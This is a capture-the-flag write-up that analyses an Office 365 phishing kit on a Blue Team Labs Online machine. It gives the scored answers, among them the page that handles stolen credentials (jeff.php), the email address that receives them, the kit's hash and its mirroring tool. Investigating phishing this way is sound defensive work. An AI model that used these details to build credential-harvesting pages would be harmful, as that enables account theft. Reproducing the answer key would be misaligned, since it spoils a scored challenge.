You have been sent a phishing link. Sadly the threat actor doesn’t know who they were dealing with. From only one phishing link find out all you can about the person responsible and bring them to justice.
- CTF is hosted on https://blueteamlabs.online/
Scenario
You have been sent a phishing link. Sadly the threat actor doesn’t know who they were dealing with. From only one phishing link find out all you can about the person responsible and bring them to justice.
Intro
First of all after connecting to the machine, there’s a note that we’re supposed to read on the desktop.
We’re supposed to visit the page mentioned, so let’s do that.
There’s no HTTPS, CSS is poor, favicon.ico isn’t being loaded (which is weird since it’s supposed to be Microsoft’s O365 logon page). This should be some warn signals ;).
One question is asking about the background image. We can grab that in the inspector just by finding the right image.
What is the full URL of the background image which is on the phishing landing page? (3 points): http://securedocument.net/secure/L0GIN/protected/login/portal/axCBhIt.png
Diving deeper
Checking the source code, there are other things that appear weird.
Checking the jeff.php we can actually read the PHP code.
What is the name of the php page which will process the stolen credentials? (3 points):
jeff.php
What email address is setup to receive the phishing credential logs? (3 points):
boris.smets@tfl-uk.co
What is the domain of the website which should appear once credentials are entered? (3 points):
office.com
Web Page Analysis
If we check the path beyond index1.html, we’ll see that directory listing is active.
There’s aparently a .zip leftover there:
One question is asking about the SHA256 hash of that .zip.
What is the SHA256 of the phishing kit in ZIP format? (Provide the last 6 characters) (3 points):
fa5b48
If we check the root page, it’ll look like an error.
But if we check the source, more information about the phishing page will be revealed.
The HTML page used on securedocument.net is a decoy. Where was this webpage mirrored from, and what tool was used? (Use the first part of the tool name only) (4 points): 61.221.12.26/cgi-sys/defaultwebpage.cgi, HTTrack
Source Code Analysis of the phishing page
Let’s unzip the code
index1.html is actualy redirect from index.html
What is the function called to produce the PHP variable which appears in the index1.html URL? (3 points):
Date().getTime()
There is an error in this phishing kit. What variable name is wrong causing the phishing site to break? (Enter any of 4 potential answers)
Problem is in the form, which sends variables with other names as expected from jeff.php causing PHP code to break.
Answer:
userrr